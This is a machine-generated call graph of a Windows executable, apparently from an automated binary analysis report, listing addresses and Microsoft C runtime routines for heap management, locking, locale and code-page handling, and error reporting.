7118 402231 __IsNonwritableInCurrentImage 7116->7118 7961 4059ce 7118->7961 7119 40224f __initterm_e 7121 40226e __IsNonwritableInCurrentImage __initterm 7119->7121 7965 40596b 7119->7965 7121->7003 7123 40601c 7122->7123 7126 406021 7122->7126 7124 404b64 ___initmbctable 111 API calls 7123->7124 7124->7126 7125 40258d 7128 4017b0 7125->7128 7126->7125 7127 404364 __wincmdln 77 API calls 7126->7127 7127->7126 8065 4014e0 GetModuleFileNameA 7128->8065 7130 4017c4 7130->7010 7131 4023d4 7130->7131 7132 4022a8 _doexit 67 API calls 7131->7132 7133 4023e5 7132->7133 7133->7010 7135 40247a 7134->7135 7136 40247f 7134->7136 7137 40580b __FF_MSGBANNER 67 API calls 7135->7137 7138 405660 __NMSG_WRITE 67 API calls 7136->7138 7137->7136 7139 402487 7138->7139 7140 4021b8 __mtinitlocknum 3 API calls 7139->7140 7141 402491 7140->7141 7141->6981 7143 40580b __FF_MSGBANNER 67 API calls 7142->7143 7144 40216e 7143->7144 7145 405660 __NMSG_WRITE 67 API calls 7144->7145 7146 402176 7145->7146 7147 404f22 __decode_pointer 6 API calls 7146->7147 7148 402181 7147->7148 7148->6989 7150 4022a8 _doexit 67 API calls 7149->7150 7151 40240b 7150->7151 7151->7013 7153 40213f Sleep GetModuleHandleW 7152->7153 7154 402161 7153->7154 7155 40215d 7153->7155 7154->7017 7155->7153 7155->7154 7217 404f19 7156->7217 7158 402426 __init_pointers __initp_misc_winsig 7220 405b76 7158->7220 7161 404ea7 __encode_pointer 6 API calls 7162 402462 7161->7162 7163 404ea7 TlsGetValue 7162->7163 7164 404ee0 GetModuleHandleW 7163->7164 7165 404ebf 7163->7165 7167 404ef0 7164->7167 7168 404efb GetProcAddress 7164->7168 7165->7164 7166 404ec9 TlsGetValue 7165->7166 7171 404ed4 7166->7171 7169 402134 __crt_waiting_on_module_handle 2 API calls 7167->7169 7170 404ed8 7168->7170 7172 404ef6 7169->7172 7170->7033 7171->7164 7171->7170 7172->7168 7172->7170 7174 403d88 7173->7174 7175 403db6 7174->7175 7223 405f27 7174->7223 7175->7020 7177 404f22 TlsGetValue 7175->7177 7178 404f3a 7177->7178 7179 404f5b GetModuleHandleW 7177->7179 7178->7179 7182 404f44 TlsGetValue 7178->7182 7180 404f76 GetProcAddress 7179->7180 7181 404f6b 7179->7181 7184 404f53 7180->7184 7183 402134 __crt_waiting_on_module_handle 2 API calls 7181->7183 7185 404f4f 7182->7185 7186 404f71 7183->7186 7184->7020 7187 4039d1 7184->7187 7185->7179 7185->7184 7186->7180 7186->7184 7189 4039da 7187->7189 7190 403a17 7189->7190 7191 4039f8 Sleep 7189->7191 7228 403f2c 7189->7228 7190->7020 7190->7045 7192 403a0d 7191->7192 7192->7189 7192->7190 7522 40379c 7193->7522 7195 40501a GetModuleHandleW 7196 405030 7195->7196 7197 40502a 7195->7197 7198 405048 GetProcAddress GetProcAddress 7196->7198 7199 40506c 7196->7199 7200 402134 __crt_waiting_on_module_handle 2 API calls 7197->7200 7198->7199 7201 403ef9 __lock 63 API calls 7199->7201 7200->7196 7202 40508b InterlockedIncrement 7201->7202 7523 4050e3 7202->7523 7205 403ef9 __lock 63 API calls 7206 4050ac 7205->7206 7526 404ccb InterlockedIncrement 7206->7526 7208 4050ca 7538 4050ec 7208->7538 7210 4050d7 ___lock_fhandle 7210->7049 7212 404fe7 7211->7212 7213 404fdb 7211->7213 7215 405009 7212->7215 7216 404ffb TlsFree 7212->7216 7214 404f22 __decode_pointer 6 API calls 7213->7214 7214->7212 7215->7215 7216->7215 7218 404ea7 __encode_pointer 6 API calls 7217->7218 7219 404f20 7218->7219 7219->7158 7221 404ea7 __encode_pointer 6 API calls 7220->7221 7222 402458 7221->7222 7222->7161 7227 40379c 7223->7227 7225 405f33 InitializeCriticalSectionAndSpinCount 7226 405f77 ___lock_fhandle 7225->7226 7226->7174 7227->7225 7229 403f38 ___lock_fhandle 7228->7229 7230 403f50 7229->7230 7235 403f6f _memset 7229->7235 7241 403750 7230->7241 7234 403fe1 HeapAlloc 7234->7235 7235->7234 7238 403f65 ___lock_fhandle 7235->7238 7247 403ef9 7235->7247 7254 407601 7235->7254 7260 404028 7235->7260 7263 405f96 7235->7263 7238->7189 7266 4050f5 GetLastError 7241->7266 7243 403755 7244 4036e8 7243->7244 7245 404f22 __decode_pointer 6 API calls 7244->7245 7246 4036f8 __invoke_watson 7245->7246 7248 403f21 EnterCriticalSection 7247->7248 7249 403f0e 7247->7249 7248->7235 7314 403e36 7249->7314 7251 403f14 7251->7248 7252 402164 __amsg_exit 66 API calls 7251->7252 7253 403f20 7252->7253 7253->7248 7255 40762f 7254->7255 7256 4076c8 7255->7256 7259 4076d1 7255->7259 7510 407168 7255->7510 7256->7259 7517 407218 7256->7517 7259->7235 7521 403e1f LeaveCriticalSection 7260->7521 7262 40402f 7262->7235 7264 404f22 __decode_pointer 6 API calls 7263->7264 7265 405fa6 7264->7265 7265->7235 7281 404f9d TlsGetValue 7266->7281 7269 405162 SetLastError 7269->7243 7270 4039d1 __calloc_crt 64 API calls 7271 405120 7270->7271 7271->7269 7272 405128 7271->7272 7273 404f22 __decode_pointer 6 API calls 7272->7273 7274 40513a 7273->7274 7275 405141 7274->7275 7276 405159 7274->7276 7277 40500e __initptd 64 API calls 7275->7277 7286 403abd 7276->7286 7279 405149 GetCurrentThreadId 7277->7279 7279->7269 7280 40515f 7280->7269 7282 404fb2 7281->7282 7283 404fcd 7281->7283 7284 404f22 __decode_pointer 6 API calls 7282->7284 7283->7269 7283->7270 7285 404fbd TlsSetValue 7284->7285 7285->7283 7288 403ac9 ___lock_fhandle 7286->7288 7287 403b42 ___lock_fhandle _realloc 7287->7280 7288->7287 7290 403ef9 __lock 65 API calls 7288->7290 7298 403b08 7288->7298 7289 403b1d HeapFree 7289->7287 7291 403b2f 7289->7291 7294 403ae0 ___sbh_find_block 7290->7294 7292 403750 __read 65 API calls 7291->7292 7293 403b34 GetLastError 7292->7293 7293->7287 7295 403afa 7294->7295 7299 406e52 7294->7299 7306 403b13 7295->7306 7298->7287 7298->7289 7300 407133 7299->7300 7301 406e91 7299->7301 7300->7295 7301->7300 7302 40707d VirtualFree 7301->7302 7303 4070e1 7302->7303 7303->7300 7304 4070f0 VirtualFree HeapFree 7303->7304 7309 409d20 7304->7309 7313 403e1f LeaveCriticalSection 7306->7313 7308 403b1a 7308->7298 7310 409d38 7309->7310 7311 409d5f __VEC_memcpy 7310->7311 7312 409d67 7310->7312 7311->7312 7312->7300 7313->7308 7315 403e42 ___lock_fhandle 7314->7315 7316 403e52 7315->7316 7317 403e6a 7315->7317 7342 40580b 7316->7342 7323 403e78 ___lock_fhandle 7317->7323 7388 40398c 7317->7388 7323->7251 7325 403e99 7329 403ef9 __lock 67 API calls 7325->7329 7326 403e8a 7328 403750 __read 67 API calls 7326->7328 7328->7323 7330 403ea0 7329->7330 7332 403ed4 7330->7332 7333 403ea8 7330->7333 7335 403abd __freea 67 API calls 7332->7335 7334 405f27 ___lock_fhandle InitializeCriticalSectionAndSpinCount 7333->7334 7336 403eb3 7334->7336 7341 403ec5 7335->7341 7337 403abd __freea 67 API calls 7336->7337 7336->7341 7339 403ebf 7337->7339 7340 403750 __read 67 API calls 7339->7340 7340->7341 7394 403ef0 7341->7394 7397 409770 7342->7397 7345 40581f 7347 405660 __NMSG_WRITE 67 API calls 7345->7347 7349 403e57 7345->7349 7346 409770 __set_error_mode 67 API calls 7346->7345 7348 405837 7347->7348 7350 405660 __NMSG_WRITE 67 API calls 7348->7350 7351 405660 7349->7351 7350->7349 7352 405674 7351->7352 7353 409770 __set_error_mode 64 API calls 7352->7353 7384 403e5e 7352->7384 7354 405696 7353->7354 7355 4057d4 GetStdHandle 7354->7355 7356 409770 __set_error_mode 64 API calls 7354->7356 7357 4057e2 _strlen 7355->7357 7355->7384 7358 4056a7 7356->7358 7360 4057fb WriteFile 7357->7360 7357->7384 7358->7355 7359 4056b9 7358->7359 7359->7384 7403 408f6b 7359->7403 7360->7384 7363 4056ef GetModuleFileNameA 7365 40570d 7363->7365 7371 405730 _strlen 7363->7371 7367 408f6b _strcpy_s 64 API calls 7365->7367 7368 40571d 7367->7368 7370 4035c0 __invoke_watson 10 API calls 7368->7370 7368->7371 7369 405773 7428 408df6 7369->7428 7370->7371 7371->7369 7419 408eb6 7371->7419 7375 405797 7378 408df6 _strcat_s 64 API calls 7375->7378 7377 4035c0 __invoke_watson 10 API calls 7377->7375 7379 4057ab 7378->7379 7381 4057bc 7379->7381 7382 4035c0 __invoke_watson 10 API calls 7379->7382 7380 4035c0 __invoke_watson 10 API calls 7380->7369 7437 409607 7381->7437 7382->7381 7385 4021b8 7384->7385 7475 40218d GetModuleHandleW 7385->7475 7390 403995 7388->7390 7391 4039cb 7390->7391 7392 4039ac Sleep 7390->7392 7479 406ac2 7390->7479 7391->7325 7391->7326 7393 4039c1 7392->7393 7393->7390 7393->7391 7509 403e1f LeaveCriticalSection 7394->7509 7396 403ef7 7396->7323 7398 40977f 7397->7398 7399 403750 __read 67 API calls 7398->7399 7402 405812 7398->7402 7400 4097a2 7399->7400 7401 4036e8 __read 6 API calls 7400->7401 7401->7402 7402->7345 7402->7346 7404 408f83 7403->7404 7405 408f7c 7403->7405 7406 403750 __read 67 API calls 7404->7406 7405->7404 7408 408fa9 7405->7408 7407 408f88 7406->7407 7409 4036e8 __read 6 API calls 7407->7409 7410 4056db 7408->7410 7411 403750 __read 67 API calls 7408->7411 7409->7410 7410->7363 7412 4035c0 7410->7412 7411->7407 7464 401ae0 7412->7464 7414 4035ed IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7415 4036c9 GetCurrentProcess TerminateProcess 7414->7415 7416 4036bd __invoke_watson 7414->7416 7466 401ee2 7415->7466 7416->7415 7418 4036e6 7418->7363 7424 408ec8 7419->7424 7420 408ecc 7421 403750 __read 67 API calls 7420->7421 7422 405760 7420->7422 7423 408ee8 7421->7423 7422->7369 7422->7380 7425 4036e8 __read 6 API calls 7423->7425 7424->7420 7424->7422 7426 408f12 7424->7426 7425->7422 7426->7422 7427 403750 __read 67 API calls 7426->7427 7427->7423 7429 408e07 7428->7429 7430 408e0e 7428->7430 7429->7430 7435 408e42 7429->7435 7431 403750 __read 67 API calls 7430->7431 7432 408e13 7431->7432 7433 4036e8 __read 6 API calls 7432->7433 7434 405786 7433->7434 7434->7375 7434->7377 7435->7434 7436 403750 __read 67 API calls 7435->7436 7436->7432 7438 404f19 ___crtMessageBoxW 6 API calls 7437->7438 7439 409617 7438->7439 7440 4096b2 7439->7440 7441 40962a LoadLibraryA 7439->7441 7448 404f22 __decode_pointer 6 API calls 7440->7448 7460 4096dc 7440->7460 7442 409754 7441->7442 7443 40963f GetProcAddress 7441->7443 7442->7384 7443->7442 7445 409655 7443->7445 7444 409707 7446 404f22 __decode_pointer 6 API calls 7444->7446 7449 404ea7 __encode_pointer 6 API calls 7445->7449 7446->7442 7447 404f22 __decode_pointer 6 API calls 7458 40971f 7447->7458 7450 4096cf 7448->7450 7451 40965b GetProcAddress 7449->7451 7452 404f22 __decode_pointer 6 API calls 7450->7452 7453 404ea7 __encode_pointer 6 API calls 7451->7453 7452->7460 7454 409670 GetProcAddress 7453->7454 7455 404ea7 __encode_pointer 6 API calls 7454->7455 7456 409685 GetProcAddress 7455->7456 7457 404ea7 __encode_pointer 6 API calls 7456->7457 7461 40969a 7457->7461 7458->7444 7459 404f22 __decode_pointer 6 API calls 7458->7459 7459->7444 7460->7444 7460->7447 7461->7440 7462 4096a4 GetProcAddress 7461->7462 7463 404ea7 __encode_pointer 6 API calls 7462->7463 7463->7440 7465 401aec __VEC_memzero 7464->7465 7465->7414 7467 401eea 7466->7467 7468 401eec IsDebuggerPresent 7466->7468 7467->7418 7474 406915 7468->7474 7471 404466 SetUnhandledExceptionFilter UnhandledExceptionFilter 7472 404483 __invoke_watson 7471->7472 7473 40448b GetCurrentProcess TerminateProcess 7471->7473 7472->7473 7473->7418 7474->7471 7476 4021a1 GetProcAddress 7475->7476 7477 4021b6 ExitProcess 7475->7477 7476->7477 7478 4021b1 7476->7478 7478->7477 7480 406b75 7479->7480 7489 406ad4 7479->7489 7481 405f96 __calloc_impl 6 API calls 7480->7481 7482 406b7b 7481->7482 7484 403750 __read 66 API calls 7482->7484 7483 40580b __FF_MSGBANNER 66 API calls 7488 406ae5 7483->7488 7496 406b6d 7484->7496 7486 405660 __NMSG_WRITE 66 API calls 7486->7488 7487 406b31 HeapAlloc 7487->7489 7488->7483 7488->7486 7488->7487 7488->7489 7490 4021b8 __mtinitlocknum 3 API calls 7488->7490 7489->7488 7491 406b61 7489->7491 7493 405f96 __calloc_impl 6 API calls 7489->7493 7494 406b66 7489->7494 7489->7496 7497 406a73 7489->7497 7490->7488 7492 403750 __read 66 API calls 7491->7492 7492->7494 7493->7489 7495 403750 __read 66 API calls 7494->7495 7495->7496 7496->7390 7498 406a7f ___lock_fhandle 7497->7498 7499 406ab0 ___lock_fhandle 7498->7499 7500 403ef9 __lock 67 API calls 7498->7500 7499->7489 7501 406a95 7500->7501 7502 407601 ___sbh_alloc_block 5 API calls 7501->7502 7503 406aa0 7502->7503 7505 406ab9 7503->7505 7508 403e1f LeaveCriticalSection 7505->7508 7507 406ac0 7507->7499 7508->7507 7509->7396 7511 40717b HeapReAlloc 7510->7511 7512 4071af HeapAlloc 7510->7512 7514 407199 7511->7514 7515 40719d 7511->7515 7513 4071d2 VirtualAlloc 7512->7513 7512->7514 7513->7514 7516 4071ec HeapFree 7513->7516 7514->7256 7515->7512 7516->7514 7518 40722f VirtualAlloc 7517->7518 7520 407276 7518->7520 7520->7259 7521->7262 7522->7195 7541 403e1f LeaveCriticalSection 7523->7541 7525 4050a5 7525->7205 7527 404ce9 InterlockedIncrement 7526->7527 7528 404cec 7526->7528 7527->7528 7529 404cf6 InterlockedIncrement 7528->7529 7530 404cf9 7528->7530 7529->7530 7531 404d03 InterlockedIncrement 7530->7531 7532 404d06 7530->7532 7531->7532 7533 404d10 InterlockedIncrement 7532->7533 7535 404d13 7532->7535 7533->7535 7534 404d2c InterlockedIncrement 7534->7535 7535->7534 7536 404d47 InterlockedIncrement 7535->7536 7537 404d3c InterlockedIncrement 7535->7537 7536->7208 7537->7535 7542 403e1f LeaveCriticalSection 7538->7542 7540 4050f3 7540->7210 7541->7525 7542->7540 7543->7052 7545 40616a 7544->7545 7548 4061d7 7545->7548 7554 404364 7545->7554 7547 4062d5 7547->7096 7547->7098 7548->7547 7549 404364 77 API calls __wincmdln 7548->7549 7549->7548 7551 404b6d 7550->7551 7552 404b74 7550->7552 7776 4049ca 7551->7776 7552->7092 7557 4042f8 7554->7557 7560 401ef1 7557->7560 7559 40430b 7559->7545 7561 401f04 7560->7561 7565 401f51 7560->7565 7568 40516e 7561->7568 7564 401f31 7564->7565 7588 4046c5 7564->7588 7565->7559 7569 4050f5 __getptd_noexit 67 API calls 7568->7569 7570 405176 7569->7570 7571 401f09 7570->7571 7572 402164 __amsg_exit 67 API calls 7570->7572 7571->7564 7573 404e31 7571->7573 7572->7571 7574 404e3d ___lock_fhandle 7573->7574 7575 40516e __getptd 67 API calls 7574->7575 7576 404e42 7575->7576 7577 404e70 7576->7577 7578 404e54 7576->7578 7579 403ef9 __lock 67 API calls 7577->7579 7580 40516e __getptd 67 API calls 7578->7580 7581 404e77 7579->7581 7582 404e59 7580->7582 7604 404df3 7581->7604 7585 404e67 ___lock_fhandle 7582->7585 7587 402164 __amsg_exit 67 API calls 7582->7587 7585->7564 7587->7585 7589 4046d1 ___lock_fhandle 7588->7589 7590 40516e __getptd 67 API calls 7589->7590 7591 4046d6 7590->7591 7592 403ef9 __lock 67 API calls 7591->7592 7599 4046e8 7591->7599 7593 404706 7592->7593 7594 40474f 7593->7594 7597 404737 InterlockedIncrement 7593->7597 7598 40471d InterlockedDecrement 7593->7598 7772 404760 7594->7772 7595 402164 __amsg_exit 67 API calls 7600 4046f6 ___lock_fhandle 7595->7600 7597->7594 7598->7597 7601 404728 7598->7601 7599->7595 7599->7600 7600->7565 7601->7597 7602 403abd __freea 67 API calls 7601->7602 7603 404736 7602->7603 7603->7597 7605 404df7 7604->7605 7606 404e29 7604->7606 7605->7606 7607 404ccb ___addlocaleref 8 API calls 7605->7607 7612 404e9b 7606->7612 7608 404e0a 7607->7608 7608->7606 7615 404d5a 7608->7615 7771 403e1f LeaveCriticalSection 7612->7771 7614 404ea2 7614->7582 7616 404d6b InterlockedDecrement 7615->7616 7617 404dee 7615->7617 7618 404d80 InterlockedDecrement 7616->7618 7619 404d83 7616->7619 7617->7606 7629 404b82 7617->7629 7618->7619 7620 404d90 7619->7620 7621 404d8d InterlockedDecrement 7619->7621 7622 404d9a InterlockedDecrement 7620->7622 7623 404d9d 7620->7623 7621->7620 7622->7623 7624 404da7 InterlockedDecrement 7623->7624 7626 404daa 7623->7626 7624->7626 7625 404dc3 InterlockedDecrement 7625->7626 7626->7625 7627 404dd3 InterlockedDecrement 7626->7627 7628 404dde InterlockedDecrement 7626->7628 7627->7626 7628->7617 7630 404c06 7629->7630 7632 404b99 7629->7632 7631 404c53 7630->7631 7633 403abd __freea 67 API calls 7630->7633 7645 404c7a 7631->7645 7683 408b8e 7631->7683 7632->7630 7635 404bcd 7632->7635 7642 403abd __freea 67 API calls 7632->7642 7636 404c27 7633->7636 7638 404bee 7635->7638 7649 403abd __freea 67 API calls 7635->7649 7639 403abd __freea 67 API calls 7636->7639 7640 403abd __freea 67 API calls 7638->7640 7644 404c3a 7639->7644 7646 404bfb 7640->7646 7641 403abd __freea 67 API calls 7641->7645 7647 404bc2 7642->7647 7643 404cbf 7648 403abd __freea 67 API calls 7643->7648 7651 403abd __freea 67 API calls 7644->7651 7645->7643 7650 403abd 67 API calls __freea 7645->7650 7652 403abd __freea 67 API calls 7646->7652 7659 408d68 7647->7659 7654 404cc5 7648->7654 7655 404be3 7649->7655 7650->7645 7656 404c48 7651->7656 7652->7630 7654->7606 7675 408d23 7655->7675 7658 403abd __freea 67 API calls 7656->7658 7658->7631 7660 408d75 7659->7660 7674 408df2 7659->7674 7661 408d86 7660->7661 7662 403abd __freea 67 API calls 7660->7662 7663 408d98 7661->7663 7665 403abd __freea 67 API calls 7661->7665 7662->7661 7664 408daa 7663->7664 7666 403abd __freea 67 API calls 7663->7666 7667 408dbc 7664->7667 7668 403abd __freea 67 API calls 7664->7668 7665->7663 7666->7664 7669 408dce 7667->7669 7670 403abd __freea 67 API calls 7667->7670 7668->7667 7671 408de0 7669->7671 7672 403abd __freea 67 API calls 7669->7672 7670->7669 7673 403abd __freea 67 API calls 7671->7673 7671->7674 7672->7671 7673->7674 7674->7635 7677 408d30 7675->7677 7682 408d64 7675->7682 7676 408d40 7678 408d52 7676->7678 7680 403abd __freea 67 API calls 7676->7680 7677->7676 7679 403abd __freea 67 API calls 7677->7679 7681 403abd __freea 67 API calls 7678->7681 7678->7682 7679->7676 7680->7678 7681->7682 7682->7638 7684 404c73 7683->7684 7685 408b9f 7683->7685 7684->7641 7686 403abd __freea 67 API calls 7685->7686 7687 408ba7 7686->7687 7688 403abd __freea 67 API calls 7687->7688 7689 408baf 7688->7689 7690 403abd __freea 67 API calls 7689->7690 7691 408bb7 7690->7691 7692 403abd __freea 67 API calls 7691->7692 7693 408bbf 7692->7693 7694 403abd __freea 67 API calls 7693->7694 7695 408bc7 7694->7695 7696 403abd __freea 67 API calls 7695->7696 7697 408bcf 7696->7697 7698 403abd __freea 67 API calls 7697->7698 7699 408bd6 7698->7699 7700 403abd __freea 67 API calls 7699->7700 7701 408bde 7700->7701 7702 403abd __freea 67 API calls 7701->7702 7703 408be6 7702->7703 7704 403abd __freea 67 API calls 7703->7704 7705 408bee 7704->7705 7706 403abd __freea 67 API calls 7705->7706 7707 408bf6 7706->7707 7708 403abd __freea 67 API calls 7707->7708 7709 408bfe 7708->7709 7710 403abd __freea 67 API calls 7709->7710 7711 408c06 7710->7711 7712 403abd __freea 67 API calls 7711->7712 7713 408c0e 7712->7713 7714 403abd __freea 67 API calls 7713->7714 7715 408c16 7714->7715 7716 403abd __freea 67 API calls 7715->7716 7717 408c1e 7716->7717 7718 403abd __freea 67 API calls 7717->7718 7719 408c29 7718->7719 7720 403abd __freea 67 API calls 7719->7720 7721 408c31 7720->7721 7722 403abd __freea 67 API calls 7721->7722 7723 408c39 7722->7723 7724 403abd __freea 67 API calls 7723->7724 7725 408c41 7724->7725 7726 403abd __freea 67 API calls 7725->7726 7727 408c49 7726->7727 7728 403abd __freea 67 API calls 7727->7728 7729 408c51 7728->7729 7730 403abd __freea 67 API calls 7729->7730 7731 408c59 7730->7731 7732 403abd __freea 67 API calls 7731->7732 7733 408c61 7732->7733 7734 403abd __freea 67 API calls 7733->7734 7735 408c69 7734->7735 7736 403abd __freea 67 API calls 7735->7736 7737 408c71 7736->7737 7738 403abd __freea 67 API calls 7737->7738 7739 408c79 7738->7739 7740 403abd __freea 67 API calls 7739->7740 7741 408c81 7740->7741 7742 403abd __freea 67 API calls 7741->7742 7743 408c89 7742->7743 7744 403abd __freea 67 API calls 7743->7744 7745 408c91 7744->7745 7746 403abd __freea 67 API calls 7745->7746 7747 408c99 7746->7747 7748 403abd __freea 67 API calls 7747->7748 7749 408ca1 7748->7749 7750 403abd __freea 67 API calls 7749->7750 7751 408caf 7750->7751 7752 403abd __freea 67 API calls 7751->7752 7753 408cba 7752->7753 7754 403abd __freea 67 API calls 7753->7754 7755 408cc5 7754->7755 7756 403abd __freea 67 API calls 7755->7756 7757 408cd0 7756->7757 7758 403abd __freea 67 API calls 7757->7758 7759 408cdb 7758->7759 7760 403abd __freea 67 API calls 7759->7760 7761 408ce6 7760->7761 7762 403abd __freea 67 API calls 7761->7762 7763 408cf1 7762->7763 7764 403abd __freea 67 API calls 7763->7764 7765 408cfc 7764->7765 7766 403abd __freea 67 API calls 7765->7766 7767 408d07 7766->7767 7768 403abd __freea 67 API calls 7767->7768 7769 408d12 7768->7769 7770 403abd __freea 67 API calls 7769->7770 7770->7684 7771->7614 7775 403e1f LeaveCriticalSection 7772->7775 7774 404767 7774->7599 7775->7774 7777 4049d6 ___lock_fhandle 7776->7777 7778 40516e __getptd 67 API calls 7777->7778 7779 4049df 7778->7779 7780 4046c5 __setmbcp 69 API calls 7779->7780 7781 4049e9 7780->7781 7807 404769 7781->7807 7784 40398c __malloc_crt 67 API calls 7785 404a0a 7784->7785 7786 404b29 ___lock_fhandle 7785->7786 7814 4047e5 7785->7814 7786->7552 7789 404b36 7789->7786 7793 404b49 7789->7793 7795 403abd __freea 67 API calls 7789->7795 7790 404a3a InterlockedDecrement 7791 404a4a 7790->7791 7792 404a5b InterlockedIncrement 7790->7792 7791->7792 7797 403abd __freea 67 API calls 7791->7797 7792->7786 7794 404a71 7792->7794 7796 403750 __read 67 API calls 7793->7796 7794->7786 7798 403ef9 __lock 67 API calls 7794->7798 7795->7793 7796->7786 7799 404a5a 7797->7799 7801 404a85 InterlockedDecrement 7798->7801 7799->7792 7802 404b01 7801->7802 7803 404b14 InterlockedIncrement 7801->7803 7802->7803 7805 403abd __freea 67 API calls 7802->7805 7824 404b2b 7803->7824 7806 404b13 7805->7806 7806->7803 7808 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7807->7808 7809 40477d 7808->7809 7810 4047a6 7809->7810 7811 404788 GetOEMCP 7809->7811 7812 4047ab GetACP 7810->7812 7813 404798 7810->7813 7811->7813 7812->7813 7813->7784 7813->7786 7815 404769 getSystemCP 79 API calls 7814->7815 7816 404805 7815->7816 7817 404810 setSBCS 7816->7817 7820 404854 IsValidCodePage 7816->7820 7822 404879 _memset __setmbcp_nolock 7816->7822 7818 401ee2 setSBUpLow 5 API calls 7817->7818 7819 4049c8 7818->7819 7819->7789 7819->7790 7820->7817 7821 404866 GetCPInfo 7820->7821 7821->7817 7821->7822 7827 404532 GetCPInfo 7822->7827 7960 403e1f LeaveCriticalSection 7824->7960 7826 404b32 7826->7786 7828 404618 7827->7828 7830 404566 _memset 7827->7830 7832 401ee2 setSBUpLow 5 API calls 7828->7832 7837 408b4c 7830->7837 7834 4046c3 7832->7834 7834->7822 7836 40894d ___crtLCMapStringA 102 API calls 7836->7828 7838 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7837->7838 7839 408b5f 7838->7839 7847 408992 7839->7847 7842 40894d 7843 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7842->7843 7844 408960 7843->7844 7913 4085a8 7844->7913 7848 4089b3 GetStringTypeW 7847->7848 7849 4089de 7847->7849 7851 4089d3 GetLastError 7848->7851 7852 4089cb 7848->7852 7850 408ac5 7849->7850 7849->7852 7875 40a82a GetLocaleInfoA 7850->7875 7851->7849 7853 408a17 MultiByteToWideChar 7852->7853 7870 408abf 7852->7870 7860 408a44 7853->7860 7853->7870 7856 401ee2 setSBUpLow 5 API calls 7857 4045d3 7856->7857 7857->7842 7858 408b16 GetStringTypeA 7863 408b31 7858->7863 7858->7870 7859 408a59 _memset __crtCompareStringA_stat 7862 408a92 MultiByteToWideChar 7859->7862 7859->7870 7860->7859 7864 406ac2 _malloc 67 API calls 7860->7864 7866 408aa8 GetStringTypeW 7862->7866 7867 408ab9 7862->7867 7868 403abd __freea 67 API calls 7863->7868 7864->7859 7866->7867 7871 408588 7867->7871 7868->7870 7870->7856 7872 408594 7871->7872 7873 4085a5 7871->7873 7872->7873 7874 403abd __freea 67 API calls 7872->7874 7873->7870 7874->7873 7876 40a858 7875->7876 7877 40a85d 7875->7877 7879 401ee2 setSBUpLow 5 API calls 7876->7879 7906 40abc6 7877->7906 7880 408ae9 7879->7880 7880->7858 7880->7870 7881 40a873 7880->7881 7882 40a8b3 GetCPInfo 7881->7882 7886 40a93d 7881->7886 7883 40a928 MultiByteToWideChar 7882->7883 7884 40a8ca 7882->7884 7883->7886 7890 40a8e3 _strlen 7883->7890 7884->7883 7887 40a8d0 GetCPInfo 7884->7887 7885 401ee2 setSBUpLow 5 API calls 7888 408b0a 7885->7888 7886->7885 7887->7883 7889 40a8dd 7887->7889 7888->7858 7888->7870 7889->7883 7889->7890 7891 40a915 _memset __crtCompareStringA_stat 7890->7891 7892 406ac2 _malloc 67 API calls 7890->7892 7891->7886 7893 40a972 MultiByteToWideChar 7891->7893 7892->7891 7894 40a98a 7893->7894 7898 40a9a9 7893->7898 7896 40a991 WideCharToMultiByte 7894->7896 7897 40a9ae 7894->7897 7895 408588 __freea 67 API calls 7895->7886 7896->7898 7899 40a9b9 WideCharToMultiByte 7897->7899 7900 40a9cd 7897->7900 7898->7895 7899->7898 7899->7900 7901 4039d1 __calloc_crt 67 API calls 7900->7901 7902 40a9d5 7901->7902 7902->7898 7903 40a9de WideCharToMultiByte 7902->7903 7903->7898 7904 40a9f0 7903->7904 7905 403abd __freea 67 API calls 7904->7905 7905->7898 7909 409ce6 7906->7909 7910 409cff 7909->7910 7911 409ab7 strtoxl 91 API calls 7910->7911 7912 409d0c 7911->7912 7912->7876 7914 4085c9 LCMapStringW 7913->7914 7918 4085e4 7913->7918 7915 4085ec GetLastError 7914->7915 7914->7918 7915->7918 7916 4087e2 7920 40a82a ___ansicp 91 API calls 7916->7920 7917 40863e 7919 408657 MultiByteToWideChar 7917->7919 7941 4087d9 7917->7941 7918->7916 7918->7917 7927 408684 7919->7927 7919->7941 7922 40880a 7920->7922 7921 401ee2 setSBUpLow 5 API calls 7923 4045f3 7921->7923 7924 408823 7922->7924 7925 4088fe LCMapStringA 7922->7925 7922->7941 7923->7836 7928 40a873 ___convertcp 74 API calls 7924->7928 7959 40885a 7925->7959 7926 4086d5 MultiByteToWideChar 7930 4087d0 7926->7930 7931 4086ee LCMapStringW 7926->7931 7933 406ac2 _malloc 67 API calls 7927->7933 7938 40869d __crtCompareStringA_stat 7927->7938 7929 408835 7928->7929 7934 40883f LCMapStringA 7929->7934 7929->7941 7935 408588 __freea 67 API calls 7930->7935 7931->7930 7936 40870f 7931->7936 7932 408925 7940 403abd __freea 67 API calls 7932->7940 7932->7941 7933->7938 7943 408861 7934->7943 7934->7959 7935->7941 7939 408718 7936->7939 7945 408741 7936->7945 7937 403abd __freea 67 API calls 7937->7932 7938->7926 7938->7941 7939->7930 7942 40872a LCMapStringW 7939->7942 7940->7941 7941->7921 7942->7930 7947 406ac2 _malloc 67 API calls 7943->7947 7955 408872 _memset __crtCompareStringA_stat 7943->7955 7944 408790 LCMapStringW 7948 4087a8 WideCharToMultiByte 7944->7948 7949 4087ca 7944->7949 7946 406ac2 _malloc 67 API calls 7945->7946 7954 40875c __crtCompareStringA_stat 7945->7954 7946->7954 7947->7955 7948->7949 7950 408588 __freea 67 API calls 7949->7950 7950->7930 7951 4088b0 LCMapStringA 7952 4088d0 7951->7952 7953 4088cc 7951->7953 7957 40a873 ___convertcp 74 API calls 7952->7957 7958 408588 __freea 67 API calls 7953->7958 7954->7930 7954->7944 7955->7951 7955->7959 7957->7953 7958->7959 7959->7932 7959->7937 7960->7826 7962 4059d4 7961->7962 7963 404ea7 __encode_pointer 6 API calls 7962->7963 7964 4059ec 7962->7964 7963->7962 7964->7119 7968 40592f 7965->7968 7967 405978 7967->7121 7969 40593b ___lock_fhandle 7968->7969 7976 4021d0 7969->7976 7975 40595c ___lock_fhandle 7975->7967 7977 403ef9 __lock 67 API calls 7976->7977 7978 4021d7 7977->7978 7979 405844 7978->7979 7980 404f22 __decode_pointer 6 API calls 7979->7980 7981 405858 7980->7981 7982 404f22 __decode_pointer 6 API calls 7981->7982 7983 405868 7982->7983 7984 4058eb 7983->7984 7999 4097bb 7983->7999 7996 405965 7984->7996 7986 404ea7 __encode_pointer 6 API 